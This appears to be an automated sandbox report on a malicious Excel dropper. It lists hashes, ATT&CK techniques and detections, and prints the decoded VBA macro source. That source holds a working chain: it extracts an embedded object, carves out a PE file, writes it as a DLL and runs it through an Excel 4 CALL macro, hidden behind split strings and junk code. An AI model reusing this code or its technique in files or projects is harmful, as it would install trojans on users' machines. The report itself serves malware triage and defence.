Office (OLE) malware analysis — malicious · aae401230eba0092

MALICIOUS

Office (OLE)

704.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-05-25

MD5: 787e54350192a8623a1da604e095bd1b SHA-1: 2a79af33c4f00721a63ff3d8a34ddc2d5d17d06d SHA-256: aae401230eba00929f36e9acf101afee527e8830b05fec0aa13834adbc9ef77e

462 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer T1204.002 Malicious File T1027 Obfuscated Files or Information

The sample is a malicious Excel document containing VBA macros that leverage `Shell()` and `CreateObject` to execute embedded code. It also references Windows API functions like `VirtualProtect`, `LoadLibrary`, and `GetProcAddress`, indicating dynamic code execution or unpacking. The presence of an embedded PE executable and ClamAV detections for 'Xls.Dropper.Agent' and 'Win.Trojan.Razy' strongly suggest this file acts as a dropper for a secondary payload. The VBA macro's intent appears to be to launch this embedded executable.

Heuristics 10

ClamAV: Xls.Dropper.Agent-7580380-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7580380-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag
```
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag

Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28539 bytes
SHA-256: `20852913d225f0836173b41bfc7f624be75705c5b224cfe9ae05a5f9855b9dd7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sem" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub addWBActivate() Dim VBProj Dim VBComp Dim codeMod Dim formsFolder As String Dim tmpColl As Collection Dim wBook As Workbook Dim filesToPrcs As Collection Dim flw Dim cdw Dim fullFName As String Dim activateExist As Boolean formsFolder = "C:\Users\GalkinVa\files_for_transport" Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder) If tmpColl Is Nothing Then Err.Raise 13, Description:="tmpColl variable doesn" End If Set filesToPrcs = tmpColl For Each fName In filesToPrcs fullFName = fName fName = flw.extractNameWithExt(fullFName) Set wBook = Workbooks.Open(fullFName) Set VBProj = wBook.VBProject If cdw.VBComponentExists("ThisWorkbook", VBProj) Then Set VBComp = VBProj.VBComponents("ThisWorkbook") ElseIf cdw.VBComponentExists("ÝòàÊíèãà", VBProj) Then Set VBComp = VBProj.VBComponents("ÝòàÊíèãà") Else Err.Raise 13, "try to set VBComponent", "components from check doesn" End If Set codeMod = VBComp.CodeModule Set tmpColl = cdw.ListProcedures(VBComp) For Each proc In tmpColl If proc = "Workbook_Activate" Then activateExist = True End If Next proc If Not activateExist Then Call cdw.CreateEventProcedure(VBComp) Else Debug.Print "Workbook_Activate already exist in " & wBook.Name End If wBook.RunAutoMacros xlAutoClose On Error Resume Next wBook.Close saveChanges:=True If Err.Number <> 0 Then Debug.Print "Error occured when try to save " & wBook.Name End If Next fName End Sub Private Sub Workbook_Activate() If UserForm1.Visible = False Then Module1.CreateLinkedChart End If End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Public Property Get Keys() As Collection Set Keys = IKeys End Property Public Property Get Items() As Collection Set Items = IItms End Property Public Sub CreateLinkedChart() Dim FucjiFilm As Object Dim SpecialPath As String Set FucjiFilm = CreateObject("WScri" + "pt.Shell") PRP = "%" & UserForm6.TextBox1.Tag UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%") UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag) ChDir (UserForm6.TextBox1.Tag) UserForm1.show End Sub Public Sub Remove(Key) If TypeName(Key) = "String" Then Dim i On Error Resume Next Call IItms.Remove(Key) Call IKeys.Remove(Key) For i = 1 To IItms.Count If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then If IItms.Item(i).Item("Name") = Key Then Call IItms.Remove(i) Call IKeys.Remove(i) Exit For End If End If Next On Error GoTo 0 Else Call IItms.Remove(Key) Call IKeys.Remove(Key) End If End Sub Private Function setItem(Key, Value, Optional RepFlg = True) Dim i As Integer If TypeName(Key) = "String" Then If RepFlg Then If Key <> "" Then Call IItms.Add(Value) Call IKeys.Add(IItms.Count) End If Else MsgBox "???" End If Else If IItms.Count < Key Then For i = IItms.Count To Key - 2 Call IItms.Add("") Next End If If RepFlg Then On Error Resume Next Call IItms.Remove(Key) On Error GoTo 0 If IItms.Count < Key Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=Key) End If Else If Key = 0 Then If IItms.Count = 0 Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=1) End If Else If IItms.Count < Key Then Call IItms.Add("") Call IItms.Add(Value) Else Call IItms.Add(Value, after:=Key) End If End If End If End If End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{69BD20F5-9B6C-4EDC-8FBB-D75A65191826}{3B83FD19-053A-46AD-B350-25218F473372}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents DoEvents ChenderBegin DoEvents End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" #If VBA7 And Win64 Then Public Const IsSecond = True #Else Public Const IsSecond = False #End If Public Function PrepareConfigForOutput() As Integer On Error Resume Next Dim i As Long Dim sNextChar As String Dim bInside As Boolean Dim bQuoted As Boolean Dim sCommand As String PrepareConfigForOutput = 0 bInsideParameter = False bQuoted = False sCommand = Command$ For i = 1 To ALen.B(sCommand) sNextChar = Mid(sCommand, i, 1) If bInsideParameter Then If bQuoted Then If sNextChar = " " Then bInsideParameter = False bQuoted = False PrepareConfigForOutput = PrepareConfigForOutput + 1 End If End If End If Next i If bInsideParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1 End Function Public Sub ChenderBegin() WhereToGo = UserForm6.TextBox1.Tag & "\stamp3" + ".xls" + "x" CustomWBP = WhereToGo + "." + "zi" + "p" buildPathFor = UserForm6.TextBox1.Tag Dim OpenForBinaryLock As String Dim CurrentSizeOfAT As Long Dim WhichArch As Integer OpenForBinaryLock = UserForm6.TextBox3.Tag + "\20report_" OpenForBinaryLock = OpenForBinaryLock & ".dl" + "l" PublicResumEraseByArrayList buildPathFor + "\ole" + "Obj" + "ect.b" + "" + "in", CustomWBP, OpenForBinaryLock ReplaceFile WhereToGo FileCopy WhereToGo, CustomWBP WhichArch = 1 Dim objDirectoryFolder As Object Dim objDirectoryFolder2 As Object Set oApp = CreateObject("Shell." + "Application") If WhichArch > 0 And WhichArch > -30 Then Set objDirectoryFolder2 = oApp.Namespace(buildPathFor) Set objDirectoryFolder = oApp.Namespace(CustomWBP) objDirectoryFolder2.CopyHere objDirectoryFolder.Items.Item("xl\e" + "mbed" + "dings\oleObject1.b" + "in") End If CurrentSizeOfAT = 221184 If IsSecond Then CurrentSizeOfAT = 300000 + 5660 + 4 WhichArch = 2 End If SimplexMethod buildPathFor + "\oleObject" + "1.b" + "in", OpenForBinaryLock, CurrentSizeOfAT, WhichArch If WhichArch > 0 Then WhichArch = WhichArch + 1 ChDir (UserForm6.TextBox3.Tag) WhichArch = WhichArch + 1 End If If WhichArch < 100 Then WhichArch = WhichArch + 1 WhichArch = WhichArch + 1 End If PrepareConfigForOutput If WhichArch < 0 Then WhichArch = WhichArch + 1 WhichArch = WhichArch + 1 End If OpenForBinaryLock = "CALL(""" + OpenForBinaryLock ExecuteExcel4Macro OpenForBinaryLock + """,""oakkzm"",""J"")" End Sub Public Function PathBack(ByVal sPath As String) As String On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathBack = tt errorhand: PathBack = sPath End Function Public Function GetParam(Count As Integer) As String Dim i As Long Dim j As Integer Dim c As String Dim bInside As Boolean Dim bQuoted As Boolean j = 1 bInside = False bQuoted = False GetParam = "" For i = 1 To Len(Command$) c = Mid$(Command$, i, 1) If bInside And bQuoted Then If c = """" Then j = j + 1 bInside = False bQuoted = False End If ElseIf bInside And Not bQuoted Then If c = " " Then j = j + 1 bInside = False bQuoted = False End If Else If c = """" Then If j > Count Then Exit Function bInside = True bQuoted = True ElseIf c <> " " Then bInside = True bQuoted = False End If End If If bInside And j = Count And c <> """" Then GetParam = GetParam & c Next i End Function Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm6" Attribute VB_Base = "0{33D13F1D-D4A0-4558-B419-4191A697F99D}{213658A8-6A80-4F3A-A8B1-7BBC3668EA27}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module6" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Private Declare PtrSafe Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long) As Long #Else Private Declare Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long) As Long Private Declare Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long #End If Private Sub cmdStart_Click() Dim System As Long Dim Sound As Long Dim result Dim Version As Long Dim Data(0 To 4095) As Byte Dim Length As Long Dim Read As Long Dim bytesread As Long Dim outfp As Long result = FMOD_Syst.em_Create(System) ERRCHECK (result) result = FMOD_Syst.em_GetVersion(System, Version) ERRCHECK (result) result = FMOD_Sys.tem_Init(System, 1, FMOD_INIT_NORMAL, 0) ERRCHECK (result) result = FMOD_Sys.tem_CreateStream(System, "../../examples/media/wave.mp3", FMOD_OPENONLY Or FMOD_ACCURATETIME, Sound) ERRCHECK (result) result = FMOD_Soun.d_GetLength(Sound, Length, FMOD_TIMEUNIT_PCMBYTES) ERRCHECK (result) bytesread = 0 Do result = FMOD_Soun.d_ReadData(Sound, GetA.ddrOf(Data(0)), 4096, Read) bytesread = bytesread + Read Call lW.rite(outfp, GetA.ddrOf(Data(0)), Read) StatusBar.SimpleText = "writing " & bytesread & " bytes of " & Length & " to output.raw" Loop While (result = FMOD_OK And Read = 4096) StatusBar.SimpleText = "done" lC.lose (outfp) result = FMOD_So.und_Release(Sound) ERRCHECK (result) result = FMOD_Sys.tem_Close(System) ERRCHECK (result) result = FMOD_Sys.tem_Release(System) ERRCHECK (result) End Sub Private Sub cmdExit_Click() Unload M.e End End Sub Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FindWindowA(vbNullString, frm.Caption) windowStyle = GetWindowLong11(windowHandle, GWL_STYLE) If show Then BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) Else BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte) If UserForm1.Enabled = True Then Put #Number, , Buffer End If End Sub Private Sub ERRCHECK(result) If msgR Then End End If If result = RCPND_FMOD_OK Then ms.gR.esult = MsgBox(" <<<No.." + ".. daaa! " & result & ") " & FMOD_Er_rorStr.ing(result)) End If End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Attribute VB_Name = "Module5" Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long) For i = 1 To Len(tmptext) If TextClockWise = True Then For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1) For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1 OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1)) If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255 Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255 Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255 Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0) End If Next y Next x Else OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1 For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2) OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1)) If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255 Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255 Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255 Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0) End If Next y Next x End If progbar.Value = i Next i progbar.Value = 0 Dra.w_Zoom picsource, pictarget End Sub Public Sub SimplexMethod(SimplexMethod2 As String, OpenForBinaryLock As String, fl As Long, Report6 As Integer) Dim Report1 As Long, ByteSpin As Byte, FirstB As Byte, SecondB As Byte, ThirdB As Byte, Report3 As Byte, Report4 As Byte Dim Class1 As Class1 Set Class1 = New Class1 Dim SimpleMethod As Integer ReDim MousePointerLeak(1 To fl) Report1 = FreeFile Open SimplexMethod2 For Binary Access Read As Report1 Dim cur As Integer cur = 1 FirstB = 77 SecondB = 90 ThirdB = 144 Do While Not EOF(Report1) Get Report1, , ByteSpin If ByteSpin = FirstB Then MousePointerLeak(1) = ByteSpin Get Report1, , Report3 If Report3 = SecondB Then MousePointerLeak(2) = Report3 Get Report1, , Report4 If Report4 = ThirdB Then MousePointerLeak(3) = Report4 If cur = Report6 Then For k = 4 To fl Get Report1, , ByteSpin MousePointerLeak(k) = ByteSpin Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close Report1 Report1 = FreeFile Open OpenForBinaryLock For Binary Lock Read Write As #Report1 For i = LBound(MousePointerLeak) To UBound(MousePointerLeak) If UserForm1.Enabled = True Then NumberBuffer Report1, MousePointerLeak(i) End If Next i Close Report1 End Sub Public Function Load(HTMLSource As Variant) As Boolean On Error GoTo ErrorTrap Const Chunk = 1000 Dim WorkingSrc As String Dim TagStart As Long Dim TagEnd As Long Dim TagLength As Long Dim TagStartString As String Dim spli.tt.est() As String Dim Ptr As Long Dim Cnt As Long Dim Pos As Long Dim testing As Boolean Dim PosScriptEnd As Long Dim PosEndScript As Long Dim PosEndScriptEnd As Long WorkingSrc = HTMLSource LocalElementCount = 0 LocalElementSize = 0 ReDim LocalElements(LocalElementSize) If NewWay Then Load = True Ptr = 0 Do BlobSN = "/blob" & GetRan.domInteger() & ":" Ptr = Ptr + 1 Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10)) spli.tt.est = Split(WorkingSrc, "<style") Cnt = UBound(spli.tt.est) + 1 If Cnt > 1 Then For Ptr = 1 To Cnt - 1 PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">") If PosScriptEnd > 0 Then PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare) If PosEndScript > 0 Then BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 End If End If Next WorkingSrc = Join(spli.tt.est, "<style") End If spli.tt.est = Split(WorkingSrc, "<style") Cnt = UBound(spli.tt.est) + 1 If Cnt > 1 Then For Ptr = 1 To Cnt - 1 PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">") If PosScriptEnd > 0 Then PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare) If PosEndScript > 0 Then BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 End If End If Next WorkingSrc = Join(spli.tt.est, "<style") End If Exit Function End If ErrorTrap: Call Handle.Error("Load", Err.Number, Err.Source, Err.Description) End Function Attribute VB_Name = "Module4" Public MousePointerLeak() As Byte Public Function SetResourceBytes(lpType As Long, lpID As Long, lpData() As Byte, lpFile As String) As Long Dim pReturn As Long, rPort As Long, nCount As Long nCount = UBound(lpData) + 1 - LBound(lpData) pReturn = BeginUpdate.Resource(lpFile, False) If pReturn <> 0 Then rPort = Update.Resource1(pReturn, lpType, lpID, 1033, lpData(LBound(lpData)), nCount) EndUpdate.Resource pReturn, False If rPort <> 0 Then SetResourceBytes = True End If End Function Sub ConvertChartToPicture() Dim Cht As Chart If ActiveChart Is Nothing Then Exit Sub If TypeName(ActiveSheet) = "Chart" Then Exit Sub Set Cht = ActiveChart Cht.CopyPicture Appearance:=xlPrinter, _ Size:=xlScreen, Format:=xlPicture ActiveWindow.RangeSelection.Select ActiveSheet.Paste End Sub Private Function setItem(Key, Value, Optional RepFlg = True) Dim i As Integer If TypeName(Key) = "String" Then If RepFlg Then If Key <> "" Then On Error Resume Next Call IItms.Remove(Key) Call IKeys.Remove(Key) On Error GoTo 0 Call IItms.Add(Value, Key) Call IKeys.Add(Key, Key) Else Call IItms.Add(Value) Call IKeys.Add(IItms.Count) End If Else MsgBox "???" End If Else If IItms.Count < Key Then For i = IItms.Count To Key - 2 Call IItms.Add("") Next End If If RepFlg Then On Error Resume Next Call IItms.Remove(Key) On Error GoTo 0 If IItms.Count < Key Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=Key) End If Else If Key = 0 Then If IItms.Count = 0 Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=1) End If Else If IItms.Count < Key Then Call IItms.Add("") Call IItms.Add(Value) Else Call IItms.Add(Value, after:=Key) End If End If End If End If End Function Public Sub ReplaceFile(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents ActiveWorkbook.Close DoEvents End Sub
`embedded_office_00002935.exe`	embedded-pe	Office MZ+PE at offset 0x2935	710347 bytes
SHA-256: `3519f5957ea024035a7f3567e056bf2230add3404f505f8c0baa3d4a88679fe6`
Detection ClamAV: Win.Trojan.Razy-7331387-0 Obfuscation or payload: likely Carved artifact entropy is 7.95, consistent with packed or encrypted content.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD002C01E7/Ole10Native	534110 bytes
SHA-256: `31c029997f3b038d33a3a5f65af1a7ddb1777968139581148f408aad71cd5bf1`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.95, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.